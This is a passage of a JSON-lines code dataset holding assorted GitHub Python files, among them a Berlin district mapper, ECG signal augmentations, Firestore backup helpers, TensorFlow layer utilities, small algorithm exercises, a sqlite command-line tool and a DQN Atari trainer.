employee_list[i][0], attendance)\n obj_sql_op.sql_write(sql_attendance_query, values)\n\n print(\"Attendance Added to the date:\",enter_date)","repo_name":"siddharthps75ps/leave2","sub_path":"db_handler_sql/add_attendance_func.py","file_name":"add_attendance_func.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"9789909763","text":"import pandas as pd\nimport re\n\nberlin_areas = pd.read_csv('raw_data//berlin_areas.csv')\n\n# extracts the postcodes from the full address using regex\n\ndef extract_postcode(text):\n return re.findall(r'(?:^|\\D)(\\d{5})(?!\\d)', text)[0]\n\n# Returns district based on postcodes\n\ndef get_district(zip_code):\n zipco = berlin_areas.loc[berlin_areas['PLZ'] == int(zip_code), 'Stadtteil']\n\n if len(zipco) == 1:\n return berlin_areas.loc[berlin_areas['PLZ'] == int(zip_code),\n 'Stadtteil'].values[0]\n elif len(zipco) > 1:\n zip_co_lst = list(zipco)\n return zip_co_lst[0]\n\n# get zipcode and district for all restaurants\n\ndef district_to_df(df_name):\n df_name['zip_code'] = df_name.full_address.apply(extract_postcode)\n df_name['district'] = df_name.zip_code.apply(get_district)\n return df_name\n\n\nlist_districts =[\n 'All','Charlottenburg', 'Kreuzberg', 'Friedrichshain', 'Mitte', 'Neukölln',\n 'Prenzlauer Berg', 'Schöneberg', 'Wilmersdorf', 'Wartenberg', 'Lichtenberg',\n 'Friedenau','Wedding','Charlottenburg-Nord', 'Moabit', 'Steglitz',\n 'Karlshorst', 'Pankow', 'Britz', 'Malchow', 'Tiergarten', 'Wittenau',\n 'Niederschöneweide', 'Alt-Hohenschönhausen', 'Tegel', 'Friedrichsfelde',\n 'Niederschönhausen','Alt-Treptow','Plänterwald', 'Französisch Buchholz',\n 'Reinickendorf','Tempelhof', 'Stadtrandsiedlung Malchow', 'Marienfelde',\n 'Marzahn', 'Baumschulenweg', 'Westend', 'Gesundbrunnen', 'Weißensee',\n 'Grunewald', 'Karow', 'Neu-Hohenschönhausen', 'Oberschöneweide', 'Mariendorf',\n 'Lichterfelde', 'Spandau', 'Blankenburg', 'Buckow', 'Lichtenrade', 'Heinersdorf'\n ]\n","repo_name":"shanudengre82/next_restaurant","sub_path":"next_restaurant/district.py","file_name":"district.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30817623676","text":"# A. match_ends\n# Given a list of strings, return the count of the number of\n# strings where the string length is 2 or more and the first\n# and last chars of the string are the same.\n# Note: python does not have a ++ operator, but += works.\ndef match_ends(words):\n\tcount = 0\n\tfor word in words:\n\t\tif len(word) >= 2 and word[0] == word[-1]:\n\t\t\tcount += 1\n\treturn count\n\n\n# B. front_x\n# Given a list of strings, return a list with the strings\n# in sorted order, except group all the strings that begin with 'x' first.\n# e.g. ['mix', 'xyz', 'apple', 'xanadu', 'aardvark'] yields\n# ['xanadu', 'xyz', 'aardvark', 'apple', 'mix']\n# Hint: this can be done by making 2 lists and sorting each of them\n# before combining them.\ndef front_x(words):\n\twords.sort()\n\tsortWords = [x for x in words if x[0] == 'x']\n\tsortWords = sortWords + [x for x in words if x not in sortWords]\n\treturn sortWords\n\n\n# C. sort_last\n# Given a list of non-empty tuples, return a list sorted in increasing\n# order by the last element in each tuple.\n# e.g. [(1, 7), (1, 3), (3, 4, 5), (2, 2)] yields\n# [(2, 2), (1, 3), (3, 4, 5), (1, 7)]\n# Hint: use a custom key= function to extract the last element form each tuple.\ndef sort_last(tuples):\n\treturn sorted(tuples, key=lambda x: int(x[-1]))\n\ndef test(got, expected):\n\tif got == expected:\n\t\tprefix = ' OK '\n\telse:\n\t\tprefix = ' X '\n\n\tprint(f'{prefix} got: {got} expected: {expected}')\n\ndef main():\n\tprint('Match ends')\n\ttest(match_ends(['aba', 'xyz', 'aa', 'x', 'bbb']), 3)\n\ttest(match_ends(['', 'x', 'xy', 'xyx', 'xx']), 2)\n\ttest(match_ends(['aaa', 'be', 'abc', 'hello']), 1)\n\n\tprint('\\nfront_x')\n\ttest(front_x(['bbb', 'ccc', 'axx', 'xzz', 'xaa']),\n\t\t ['xaa', 'xzz', 'axx', 'bbb', 'ccc'])\n\ttest(front_x(['ccc', 'bbb', 'aaa', 'xcc', 'xaa']),\n\t\t ['xaa', 'xcc', 'aaa', 'bbb', 'ccc'])\n\ttest(front_x(['mix', 'xyz', 'apple', 'xanadu', 'aardvark']),\n\t\t ['xanadu', 'xyz', 'aardvark', 'apple', 'mix'])\n\n\tprint('\\nsort_last')\n\ttest(sort_last([(1, 3), (3, 2), (2, 1)]),\n\t\t [(2, 1), (3, 2), (1, 3)])\n\ttest(sort_last([(2, 3), (1, 2), (3, 1)]),\n\t\t [(3, 1), (1, 2), (2, 3)])\n\ttest(sort_last([(1, 7), (1, 3), (3, 4, 5), (2, 2)]),\n\t\t [(2, 2), (1, 3), (3, 4, 5), (1, 7)])\n\n\nif __name__ == '__main__':\n\tmain()","repo_name":"stemasoff/GooglePythonExercises","sub_path":"Basic/list1.py","file_name":"list1.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"22384702270","text":"import os\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\nimport cv2\n\n## get filename during run time\ndirname, filename = os.path.split(os.path.abspath(__file__))\nprint(\"running: {}\".format(filename) )\n## change directory to the current directory where code is saved\n\n \ndef add_noise_with_SNR(signal, noise_amount):\n \"\"\" \n adding noise\n noise amount limit 0.005 - 0.05 \"\"\"\n \n target_snr_db = noise_amount #20\n # Calculate signal power and convert to dB \n x_watts = signal ** 2\n# x_db = 10 * np.log10(x_watts)\n \n sig_avg_watts = np.mean(x_watts)\n sig_avg_db = 10 * np.log10(sig_avg_watts)\n # Calculate noise according to [2] then convert to watts\n noise_avg_db = sig_avg_db - target_snr_db\n noise_avg_watts = 10 ** (noise_avg_db / 10)\n # Generate an sample of white noise\n mean_noise = 0\n noise_volts = np.random.normal(mean_noise, np.sqrt(noise_avg_watts), len(x_watts))\n noised_signal = signal + noise_volts\n\n return noised_signal \n\ndef scaled(signal, factor):\n \"\"\"\"\n scale the signal\n scaling factor limit 0.2 - 2 \"\"\"\n scaled_signal = signal * factor\n return scaled_signal\n \n\ndef negate(signal):\n \"\"\" \n negate the signal \"\"\"\n negated_signal = signal * (-1)\n return negated_signal\n\n \ndef hor_filp(signal):\n \"\"\" \n flipped horizontally \"\"\"\n hor_flipped = np.flip(signal)\n return hor_flipped\n\n## permuted\n\ndef permute(signal, pieces):\n \"\"\" \n signal permutation\n number of pieces limit 2-20 \"\"\"\n pieces = int(np.ceil(np.shape(signal)[0]/(np.shape(signal)[0]//pieces)).tolist())\n piece_length = int(np.shape(signal)[0]//pieces)\n \n sequence = list(range(0,pieces))\n np.random.shuffle(sequence)\n \n permuted_signal = np.reshape(signal[:(np.shape(signal)[0]//pieces*pieces)], (pieces, piece_length)).tolist() + [signal[(np.shape(signal)[0]//pieces*pieces):]]\n permuted_signal = np.asarray(permuted_signal)[sequence]\n permuted_signal = np.hstack(permuted_signal)\n \n \n return permuted_signal\n\n \n## timewarping\n \ndef time_warp(signal, sampling_freq, pieces, stretch_factor, squeeze_factor):\n \"\"\" \n signal time warping: stretch and squeeze some part of the signal\n bellow is the best limit of the parameters\n slices should be factor of time_length\n stretch_factor = 1.2\n squeeze_factor = 1.2\n pieces = 6, 2, \n sampling_freq = 256 \"\"\"\n total_time = np.shape(signal)[0]//sampling_freq\n segment_time = total_time/pieces\n sequence = list(range(0,pieces))\n stretch = np.random.choice(sequence, math.ceil(len(sequence)/2), replace = False)\n squeeze = list(set(sequence).difference(set(stretch)))\n initialize = True\n for i in sequence:\n orig_signal = signal[int(i*np.floor(segment_time*sampling_freq)):int((i+1)*np.floor(segment_time*sampling_freq))]\n orig_signal = orig_signal.reshape(np.shape(orig_signal)[0],1)\n if i in stretch:\n output_shape = int(np.ceil(np.shape(orig_signal)[0]*stretch_factor))\n new_signal = cv2.resize(orig_signal, (1, output_shape), interpolation=cv2.INTER_LINEAR)\n if initialize == True:\n time_warped = new_signal\n initialize = False\n else:\n time_warped = np.vstack((time_warped, new_signal))\n elif i in squeeze:\n output_shape = int(np.ceil(np.shape(orig_signal)[0]*squeeze_factor))\n new_signal = cv2.resize(orig_signal, (1, output_shape), interpolation=cv2.INTER_LINEAR)\n if initialize == True:\n time_warped = new_signal\n initialize = False\n else:\n time_warped = np.vstack((time_warped, new_signal))\n return time_warped\n \n\n","repo_name":"pritamqu/SSL-ECGv2","sub_path":"codes/signal_transformation_task.py","file_name":"signal_transformation_task.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"27762873129","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom googlecloudsdk.api_lib.firestore import api_utils\n\n\ndef _GetBackupService():\n \"\"\"Returns the service for interacting with the Firestore Backup service.\"\"\"\n return api_utils.GetClient().projects_locations_backups\n\n\ndef ListBackups(project, location):\n \"\"\"Lists backups available to Google Cloud Firestore.\n\n Args:\n project: the project id to list backups, a string.\n location: the location to list backups, a string.\n\n Returns:\n a List of Backups.\n \"\"\"\n return list(\n _GetBackupService()\n .List(\n api_utils.GetMessages().FirestoreProjectsLocationsBackupsListRequest(\n parent='projects/{}/locations/{}'.format(project, location)\n )\n )\n .backups\n )\n\n\ndef GetBackup(project, location, backup):\n \"\"\"Gets backup with the given name.\n\n Args:\n project: the project id to get backup, a string.\n location: the location to get backup, a string.\n backup: the backup id to get backup, a string.\n\n Returns:\n A Backup.\n \"\"\"\n return _GetBackupService().Get(\n api_utils.GetMessages().FirestoreProjectsLocationsBackupsGetRequest(\n name='projects/{}/locations/{}/backups/{}'.format(\n project, location, backup\n )\n )\n )\n\n\ndef DeleteBackup(project, location, backup):\n \"\"\"Deletes backup with the given name.\n\n Args:\n project: the project id to get backup, a string.\n location: the location to get backup, a string.\n backup: the backup id to get backup, a string.\n\n Returns:\n Empty.\n \"\"\"\n\n return _GetBackupService().Delete(\n api_utils.GetMessages().FirestoreProjectsLocationsBackupsDeleteRequest(\n name='projects/{}/locations/{}/backups/{}'.format(\n project, location, backup\n )\n )\n )\n","repo_name":"twistedpair/google-cloud-sdk","sub_path":"google-cloud-sdk/lib/googlecloudsdk/api_lib/firestore/backups.py","file_name":"backups.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"7"} +{"seq_id":"4941757784","text":"import tensorflow as tf\nfrom functools import reduce\nfrom operator import mul\n\ndef assert_rank(tensor, expected_rank, name=None):\n \"\"\"Raises an exception if the tensor rank is not of the expected rank.\n\n Args:\n tensor: A tf.Tensor to check the rank of.\n expected_rank: Python integer or list of integers, expected rank.\n name: Optional name of the tensor for the error message.\n\n Raises:\n ValueError: If the expected shape doesn't match the actual shape.\n \"\"\"\n if name is None:\n name = tensor.name\n\n expected_rank_dict = {}\n if isinstance(expected_rank, six.integer_types):\n expected_rank_dict[expected_rank] = True\n else:\n for x in expected_rank:\n expected_rank_dict[x] = True\n\n actual_rank = tensor.shape.ndims\n if actual_rank not in expected_rank_dict:\n scope_name = tf.get_variable_scope().name\n raise ValueError(\n \"For the tensor `%s` in scope `%s`, the actual rank \"\n \"`%d` (shape = %s) is not equal to the expected rank `%s`\" %\n (name, scope_name, actual_rank, str(tensor.shape), str(expected_rank)))\n\ndef dropout(x, keep_prob, is_train, noise_shape=None, seed=None, name=None):\n \"\"\"\n with tf.name_scope(name or \"dropout\"):\n if is_train is None:\n if keep_prob < 1.0:\n return tf.nn.dropout(x, keep_prob, noise_shape=noise_shape, seed=seed)\n else:\n if keep_prob < 1.0:\n out = tf.cond(\n is_train,\n lambda: tf.nn.dropout(x, keep_prob, noise_shape=noise_shape, seed=seed),\n lambda: x\n )\n return out\n \"\"\"\n with tf.name_scope(name or \"dropout\"):\n if is_train is None:\n if keep_prob < 1.0:\n return tf.nn.dropout(x, keep_prob, noise_shape=noise_shape, seed=seed)\n else:\n if is_train and keep_prob < 1.0:\n return tf.nn.dropout(x, keep_prob, noise_shape=noise_shape, seed=seed)\n return x\n\ndef get_shape_list(tensor, expected_rank=None, name=None):\n \"\"\"Returns a list of the shape of tensor, preferring static dimensions.\n\n Args:\n tensor: A tf.Tensor object to find the shape of.\n expected_rank: (optional) int. The expected rank of `tensor`. If this is\n specified and the `tensor` has a different rank, and exception will be\n thrown.\n name: Optional name of the tensor for the error message.\n\n Returns:\n A list of dimensions of the shape of tensor. All static dimensions will\n be returned as python integers, and dynamic dimensions will be returned\n as tf.Tensor scalars.\n \"\"\"\n if name is None:\n name = tensor.name\n\n if expected_rank is not None:\n assert_rank(tensor, expected_rank, name)\n\n shape = tensor.shape.as_list()\n\n non_static_indexes = []\n for (index, dim) in enumerate(shape):\n if dim is None:\n non_static_indexes.append(index)\n\n if not non_static_indexes:\n return shape\n\n dyn_shape = tf.shape(tensor)\n for index in non_static_indexes:\n shape[index] = dyn_shape[index]\n return shape\n\ndef selu(x):\n with tf.name_scope('elu') as scope:\n alpha = 1.6732632423543772848170429916717\n scale = 1.0507009873554804934193349852946\n return scale * tf.where(x >= 0.0, x, alpha * tf.nn.elu(x))\n\ndef gelu(x): # read\n # return 0.5*x*(1+tf.tanh(math.sqrt(2/math.pi)*(x+0.044715*tf.pow(x, 3))))\n \"\"\"Gaussian Error Linear Unit.\n\n This is a smoother version of the RELU.\n Original paper: https://arxiv.org/abs/1606.08415\n\n Args:\n input_tensor: float Tensor to perform activation.\n\n Returns:\n `input_tensor` with the GELU activation applied.\n \"\"\"\n cdf = 0.5 * (1.0 + tf.erf(x / tf.sqrt(2.0)))\n return x * cdf\n\ndef swish(x):\n return x*tf.nn.sigmoid(x)\n\ndef activation_name_to_func(activation_name):\n assert isinstance(activation_name, str)\n if isinstance(activation_name, str):\n if activation_name == 'linear':\n act_fn = tf.identity\n elif activation_name == 'relu':\n act_fn = tf.nn.relu\n elif activation_name == 'elu':\n act_fn = tf.nn.elu\n elif activation_name == 'selu':\n act_fn = selu\n elif activation_name == 'sigmoid':\n act_fn = tf.nn.sigmoid\n elif activation_name == 'tanh':\n act_fn = tf.nn.tanh\n elif activation_name == 'exp':\n act_fn = tf.exp\n elif activation_name == 'log':\n act_fn = tf.log\n elif activation_name == 'gelu':\n act_fn = gelu\n elif activation_name == 'swish':\n act_fn = swish\n elif activation_name == 'lrelu':\n act_fn = tf.nn.leaky_relu\n else:\n raise AttributeError('no activation function named as %s' % activation_name)\n elif hasattr(activation_name, '__call__'): # callable\n act_fn = activation_name\n else:\n raise AttributeError\n return act_fn\n\ndef act_name2fn(afn):\n return activation_name_to_func(afn)\n\ndef bn_dense_layer_v2(\n input_tensor, hn, bias, bias_start=0.0, scope=None,\n activation='relu', enable_bn=False,\n wd=0., keep_prob=1.0, is_train=None, dup_num=1, merge_var=False\n):\n act_fn = act_name2fn(activation)\n with tf.variable_scope(scope or 'bn_dense_layer'):\n input_tensor = dropout(input_tensor, keep_prob, is_train)\n # the comment use a 3d tensor [bs,sl,hn] as a example\n input_shape = get_shape_list(input_tensor) # [3]\n assert len(input_shape) >= 2 # at least [bs,hn]\n # merge\n dims_merge = input_shape[:-1] # [all unrelated dims]\n new_dim = reduce(mul, dims_merge) # get the merged dim\n new_shape = [new_dim, input_shape[-1]] # new shape for matmul [2]\n input_tensor_rsp = tf.reshape(input_tensor, new_shape) # [xx,dim]\n\n # dense layer\n input_dim = new_shape[-1]\n if merge_var:\n weight = tf.get_variable('W', shape=[input_dim, hn * dup_num], dtype=tf.float32)\n else:\n weight_list = []\n for i in range(dup_num):\n weight_list.append(tf.get_variable('W_%d' % i, shape=[input_dim, hn]))\n weight = tf.concat(weight_list, -1)\n output_rsp = tf.matmul(input_tensor_rsp, weight)\n\n if bias:\n if merge_var or dup_num == 1:\n bias_val = tf.get_variable(\n 'bias', shape=[hn * dup_num], dtype=tf.float32,\n initializer=tf.constant_initializer(bias_start)\n )\n else:\n bias_list = []\n for i in range(dup_num):\n bias_list.append(\n tf.get_variable(\n 'bias_%d' % i, shape=[hn], dtype=tf.float32,\n initializer=tf.constant_initializer(bias_start))\n )\n bias_val = tf.concat(bias_list, -1)\n output_rsp += bias_val\n\n # output reshape\n output_shape = dims_merge + [hn * dup_num] # [3] for [bs,sl,new_hn]\n output = tf.reshape(output_rsp, output_shape) # [bs,sl,new_hn]\n\n if enable_bn:\n output = tf.contrib.layers.batch_norm(\n output, center=True, scale=True, is_training=is_train,\n updates_collections=None, decay=0.9,\n scope='bn')\n\n if wd:\n tf.add_to_collection('reg_vars', weight)\n\n return act_fn(output)","repo_name":"YangLi1221/CoRA","sub_path":"utilize.py","file_name":"utilize.py","file_ext":"py","file_size_in_byte":7612,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"12479611171","text":"\"\"\"\nYou are a professional robber planning to rob houses along a street. Each house has a certain amount of money stashed, the only constraint stopping you from robbing each of them is that adjacent houses have security system connected and it will automatically contact the police if two adjacent houses were broken into on the same night.\n\nGiven a list of non-negative integers representing the amount of money of each house, determine the maximum amount of money you can rob tonight without alerting the police.\n\n \n\nExample 1:\n\nInput: nums = [1,2,3,1]\nOutput: 4\nExplanation: Rob house 1 (money = 1) and then rob house 3 (money = 3).\n Total amount you can rob = 1 + 3 = 4.\nExample 2:\n\nInput: nums = [2,7,9,3,1]\nOutput: 12\nExplanation: Rob house 1 (money = 2), rob house 3 (money = 9) and rob house 5 (money = 1).\n Total amount you can rob = 2 + 9 + 1 = 12.\n \n\nConstraints:\n\n0 <= nums.length <= 100\n0 <= nums[i] <= 400\nAccepted\n653,391\nSubmissions\n1,530,733\n\nSolution : At each house, see if it is more profitable to rob it or not.\n This means dp[i] = max(dp[i-1], dp[i-2]+nums[i])\n Not rob, robbing current house\n \n Time complexity : O(N)\n Space complexity : O(N)\n\"\"\"\n\nclass Solution:\n def rob(self, nums: List[int]) -> int:\n if not nums:\n return 0\n if len(nums) <= 2:\n return max(nums)\n dp = [0]*len(nums)\n \n for index, num in enumerate(nums):\n dp[index] = max(dp[index-1], dp[index-2] + num)\n return dp[-1]","repo_name":"jojojoseph94/lc-practice","sub_path":"dynamic-programming/House Robber.py","file_name":"House Robber.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72079091424","text":"def isValid(board):\n d = {}\n d['X'] = 0\n d['O'] = 0\n d['-'] = 0\n for i in board:\n for j in i:\n d[j] += 1\n if d['X'] - d['O'] > 1:\n return 'No'\n\n ct_X, ct_O = 0, 0\n for i in board:\n st = ''\n for j in i:\n st += j\n if st == 'XXX':\n ct_X += 1\n if st == 'OOO':\n ct_O += 1\n \n if board[0][0]+board[1][1] + board[2][2] == 'XXX':\n ct_X += 1\n if board[0][0]+board[1][1] + board[2][2] == 'OOO':\n ct_O += 1\n if board[0][2]+board[1][1] + board[2][0] == 'XXX':\n ct_X += 1\n if board[0][2]+board[1][1] + board[2][0] == 'OOO':\n ct_O += 1\n \n for i in range(3):\n st = ''\n for j in range(3):\n st += board[j][i]\n if st == 'XXX':\n ct_X += 1\n if st == 'OOO':\n ct_O += 1\n \n if (ct_O > 0 and ct_X > 0) or ct_X > 1 or ct_O > 1:\n return 'No'\n return 'Yes'\n\n\nboard = []\nfor _ in range(3):\n row = input()\n board.append(list(row))\n\nprint(isValid(board))\n","repo_name":"deadpool2794/python","sub_path":"SimpleGame.py","file_name":"SimpleGame.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"20692606338","text":"#algoritmo de insertion sort\n\ndef insertion_sort(l):\n for i in range(1,len(l)):\n j=i-1\n key=l[i] \n while (l[j]>key) and (j>=0):\n l[j+1]=l[j]\n j-=1\n l[j+1]=key\n return l\n\nlista = []\nprint(\"Entre com 10 numeros reais e tenha eles organizados em ordem crescente\")\n\nfor n in range(0,10):\n while True:\n try:\n elemento = float(input(\"Digite o numero: \"))\n break\n except:\n continue\n lista.append(elemento)\n\nlista = insertion_sort(lista)\nprint(lista)","repo_name":"Monoclinico/Programas_Python_1","sub_path":"insertion_sort.py","file_name":"insertion_sort.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"9317212200","text":"import argparse\nimport logging\nimport os\nimport sys\nfrom db_util import dbmanip as db\nimport util.loggerinitializer as utl\n\n# Initialize log object\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\nutl.initialize_logger(os.getcwd(), logger)\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"A Tool manipulate a sqlite DB\")\n\n subparsers = parser.add_subparsers(title='actions',\n description='valid actions',\n help='Use sqlite-python.py {action} -h for help with each action',\n dest='command'\n )\n\n parser_index = subparsers.add_parser('createdb', help='Create database and tables')\n\n parser_index.add_argument(\"--db\", dest='db', default=None, action=\"store\", help=\"The DB name\",\n required=True)\n\n parser_insert = subparsers.add_parser('insert', help='Insert data on tables')\n\n parser_insert.add_argument(\"--file\", default=None, action=\"store\", help=\"TSV file with the data to be inserted\",\n required=True)\n\n parser_insert.add_argument(\"--db\", default=None, action=\"store\", help=\"The DB name\",\n required=True)\n\n\n parser_update = subparsers.add_parser('update', help='Update a field in a db')\n\n parser_update.add_argument(\"--db\", default=None, action=\"store\", help=\"The DB name\",\n required=True)\n\n parser_update.add_argument(\"--a\", default=False, action=\"store\", help=\"assay\",\n required=False)\n\n parser_update.add_argument(\"--an\", default=False, action=\"store\", help=\"assay new\",\n required=False)\n\n parser_update.add_argument(\"--d\", default=False, action=\"store\", help=\"donor\",\n required=False)\n\n parser_update.add_argument(\"--dn\", default=False, action=\"store\", help=\"donor new\",\n required=False)\n\n\n\n parser_select = subparsers.add_parser('select', help='Select fields from the db')\n\n parser_select.add_argument(\"--db\", default=None, action=\"store\", help=\"The DB name\",\n required=True)\n\n parser_select.add_argument(\"--ct\", default=False, action=\"store_true\", help=\"Select all cell_types\",\n required=False)\n\n\n parser_select.add_argument(\"-a\", default=False, action=\"store\",\n help=\"Select all assays, track_name, track_type, track_densit and date of a given chipseq with the defined assays\",\n required=False)\n\n parser_select.add_argument(\"-atn\", default=False, action=\"store\",\n help=\"Select track_name, and date of a given chipseq with the defined assay_track_name\",\n required=False)\n\n parser_select.add_argument(\"-ac\", default=False, action=\"store\",\n help=\"Select cell_type, and date of a given chipseq with the defined assay_cell\",\n required=False)\n\n\n parser_delete = subparsers.add_parser('delete', help='delete rows from the db')\n\n parser_delete.add_argument(\"-tn\", default=None, action=\"store\", help=\"Delete rows where this appears\",\n required=False)\n\n parser_delete.add_argument(\"--db\", default=None, action=\"store\", help=\"The DB name\",\n required=True)\n\n\n args = parser.parse_args()\n # print(args)\n\n # sys.exit()\n conn = db.connect_db(args.db, logger)\n\n if args.command == \"createdb\":\n\n db.create_table(conn, logger)\n\n\n elif args.command == \"insert\":\n list_of_data = []\n\n with open(args.file, 'r') as f:\n for line in f:\n\n # reset dictionary\n line_dict = dict()\n\n # Skip empty lines\n if not line.strip():\n continue\n if line.startswith(','):\n continue\n\n # split line\n values = line.strip().split(',')\n\n # put each field in a dict\n line_dict['cell_type_category'] = values[0]\n line_dict['cell_type'] = values[1]\n line_dict['cell_type_track_name'] = values[2]\n line_dict['cell_type_short'] = values[3]\n line_dict['assay_category'] = values[4]\n line_dict['assay'] = values[5]\n line_dict['assay_track_name'] = values[6]\n line_dict['assay_short'] = values[7]\n line_dict['donor'] = values[8]\n line_dict['time_point'] = values[9]\n line_dict['view'] = values[10]\n line_dict['track_name'] = values[11]\n line_dict['track_type'] = values[12]\n line_dict['track_density'] = values[13]\n line_dict['provider_institution'] = values[14]\n line_dict['source_server'] = values[15]\n line_dict['source_path_to_file'] = values[16]\n line_dict['server'] = values[17]\n line_dict['path_to_file'] = values[18]\n line_dict['new_file_name'] = values[19]\n\n\n #append the dict to a list\n list_of_data.append(line_dict)\n\n db.insert_data(conn, list_of_data, logger)\n\n\n elif args.command == \"update\" and args.a is not False:\n db.update_assay(conn, args.a, args.an, logger)\n\n elif args.command == \"update\" and args.d is not False:\n db.update_donor(conn, args.d, args.dn, logger)\n\n\n\n elif args.command == \"select\" and args.ct is not False:\n all_cell_types = db.select_cell_types(conn, logger)\n\n for cell_type in all_cell_types:\n print(cell_type[0])\n\n\n\n elif args.command == \"select\" and args.a is not False:\n all_assays = db.select_assays(conn, args.a, logger)\n\n print(\"\\n| track_name\\t| track_type\\t| track_density\")\n for assays in all_assays:\n print(\"|\",\"\\t| \".join(assays))\n\n\n elif args.command == \"select\" and args.atn is not False:\n all_assay_track_names = db.select_assay_track_names(conn, args.atn, logger)\n\n print(\"\\n| track_name\")\n for assay_track_name in all_assay_track_names:\n print(\"|\",\"\\t| \".join(assay_track_name))\n\n\n elif args.command == \"select\" and args.ac is not False:\n all_assay_cells = db.select_assay_cells(conn, args.ac, logger)\n\n print(\"\\n| cell_type\")\n for assay_cell in all_assay_cells:\n print(\"|\",\"\\t| \".join(assay_cell))\n\n\n elif args.command == \"delete\":\n db.delete_track_name(conn, args.tn, logger)\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n","repo_name":"marianneoliveira93/curso-python","sub_path":"project_final/sqlite-python.py","file_name":"sqlite-python.py","file_ext":"py","file_size_in_byte":6775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"20120518507","text":"import argparse\nimport sys\n\nimport gym\nimport numpy as np\nimport torch\nfrom tqdm import tqdm\n\nsys.path.append('../../')\nfrom agent import AtariAgent\nfrom model import AtariModel\nfrom replay_memory import Experience, ReplayMemory\n\nfrom rltoolkit.env.atari_wrappers import wrap_deepmind\nfrom rltoolkit.policy.modelfree.ddqn import DDQN\nfrom rltoolkit.policy.modelfree.dqn import DQN\nfrom rltoolkit.utils import logger, tensorboard\n\n# env params\nIMAGE_SIZE = (84, 84)\nCONTEXT_LEN = 4\nFRAME_SKIP = 4\n\n# model params\nUPDATE_TARGET_STEP = 2500\nMEMORY_SIZE = 1000000\nGAMMA = 0.99\nLR_START = 0.0003 # LR start\nTOTAL_STEP = 1000000\nMEMORY_WARMUP_SIZE = 50000\nUPDATE_FREQ = 4\nBATCH_SIZE = 32\n\n# eval params\nEVAL_RENDER = False\n\n\n# train an episode\ndef run_train_episode(agent, env, rpm):\n total_reward = 0\n obs = env.reset()\n step = 0\n loss_lst = []\n\n while True:\n step += 1\n context = rpm.recent_obs()\n context.append(obs)\n context = np.stack(context, axis=0)\n\n action = agent.sample(context)\n next_obs, reward, done, _ = env.step(action)\n rpm.append(Experience(obs, action, reward, done))\n\n # train model\n if (rpm.size() > MEMORY_WARMUP_SIZE) and (step % UPDATE_FREQ == 0):\n # s,a,r,s',done\n (batch_all_obs, batch_action, batch_reward,\n batch_done) = rpm.sample_batch(BATCH_SIZE)\n batch_obs = batch_all_obs[:, :CONTEXT_LEN, :, :]\n batch_next_obs = batch_all_obs[:, 1:, :, :]\n\n train_loss = agent.learn(batch_obs, batch_action, batch_reward,\n batch_next_obs, batch_done)\n loss_lst.append(train_loss)\n\n total_reward += reward\n obs = next_obs\n if done:\n break\n return total_reward, step, np.mean(loss_lst)\n\n\ndef run_evaluate_episodes(agent, env):\n obs = env.reset()\n while not env.get_real_done():\n action = agent.predict(obs)\n obs, _, done, _ = env.step(action)\n if EVAL_RENDER:\n env.render()\n if done:\n obs = env.reset()\n return np.mean(env.get_eval_rewards())\n\n\ndef main():\n env = gym.make(args.env)\n env = wrap_deepmind(\n env, dim=IMAGE_SIZE[0], framestack=False, obs_format='NCHW')\n test_env = gym.make(args.env)\n test_env = wrap_deepmind(\n test_env, dim=IMAGE_SIZE[0], obs_format='NCHW', test=True)\n\n # set seed\n torch.manual_seed(args.train_seed)\n torch.cuda.manual_seed_all(args.train_seed)\n env.seed(args.train_seed)\n test_env.seed(args.test_seed)\n\n device = torch.device(\n 'cuda') if torch.cuda.is_available() else torch.device('cpu')\n\n rpm = ReplayMemory(MEMORY_SIZE, IMAGE_SIZE, CONTEXT_LEN)\n act_dim = env.action_space.n\n\n # get model\n model = AtariModel(act_dim, args.dueling)\n\n # get algorithm\n algo_name = args.algo\n if algo_name == 'DQN':\n alg = DQN(model, gamma=GAMMA, lr=LR_START, device=device)\n else:\n alg = DDQN(model, gamma=GAMMA, lr=LR_START, device=device)\n\n # get agent\n agent = AtariAgent(\n alg,\n act_dim=act_dim,\n total_step=TOTAL_STEP,\n update_target_step=UPDATE_TARGET_STEP,\n start_lr=LR_START,\n device=device)\n\n # start training, memory warm up\n with tqdm(\n total=MEMORY_WARMUP_SIZE, desc='[Replay Memory Warm Up]') as pbar:\n while rpm.size() < MEMORY_WARMUP_SIZE:\n total_reward, steps, _ = run_train_episode(agent, env, rpm)\n pbar.update(steps)\n\n test_flag = 0\n train_total_steps = args.train_total_steps\n pbar = tqdm(total=train_total_steps)\n cum_steps = 0 # this is the current timestep\n while cum_steps < train_total_steps:\n # start epoch\n total_reward, steps, loss = run_train_episode(agent, env, rpm)\n cum_steps += steps\n\n pbar.set_description('[train]exploration, learning rate:{}, {}'.format(\n agent.curr_ep, agent.alg.optimizer.param_groups[0]['lr']))\n tensorboard.add_scalar('{}/training_rewards'.format(algo_name),\n total_reward, cum_steps)\n 